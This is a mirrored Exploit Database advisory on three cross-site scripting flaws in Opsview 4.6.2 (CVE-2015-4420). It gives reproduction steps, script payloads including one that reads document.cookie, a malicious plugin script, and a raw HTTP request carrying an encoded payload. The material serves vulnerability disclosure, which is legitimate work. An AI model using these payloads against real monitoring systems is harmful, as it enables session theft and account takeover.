Opsview 4.6.2 – Multiple Cross-Site Scripting Vulnerabilities

• Exploit Database
• 105 阅读

• 作者： Dolev Farhi
  日期： 2015-06-12
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/37271/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69

  # Exploit title: Opsview 4.6.2 - Multiple XSS # Date: 07-06-2015 # Vendor homepage: www.opsview.com # Version: 4.6.2 # CVE: CVE-2015-4420 # Author: Dolev Farhi @dolevf # Tested On: Kali Linux + Windows 7   # Details: # -------- # Opsview is a monitoring system based on Nagios Core. Opsview is prone to several stored and reflected XSS vulnerabilities in the latest version       1. Stored XSS through a malicious check plugin   a. Create a plugin with the following content:   #!/bin/bash echo &apos;<script>alert("script0t0s")</script>&apos; exit 2   b. create a new check and assign this plugin.   c. once a host uses this check, navigate to the event page, the XSS will be injected.   d. once a user/admin acknowledges this critical event (exit 2), the code will be injected prior his acknowledgement.       2. Stored XSS in host profile   a. add a host   b. in the description of the host, add a description as the one below: <script>alert(document.cookie)</script>   c. save settings   d. once a user/admin views the host settings, XSS will be injected.     3. Reflected XSS in Test service check page. a. Add a new service check   b. Test the new service check against any host and provide in the command line the following <script>alert("test")</script>   c. the XSS will immediately reflect to the screen.   response output:   POST /state/service/166/exec HTTP/1.1 Host: 192.168.0.20 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0 Accept: text/plain, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://192.168.0.20/status/service?host_state=0&host_filter=handled&host=opsview Content-Length: 105 Cookie: PHPSESSID= auth_tkt= Connection: keep-alive Pragma: no-cache Cache-Control: no-cache   plugin_args=%3Cscript%3Ealert(%22opsview%22)%3C%2Fscript%3E&_CSRFToken=0x84BCDAD00D5111E5988CB34E7AFD915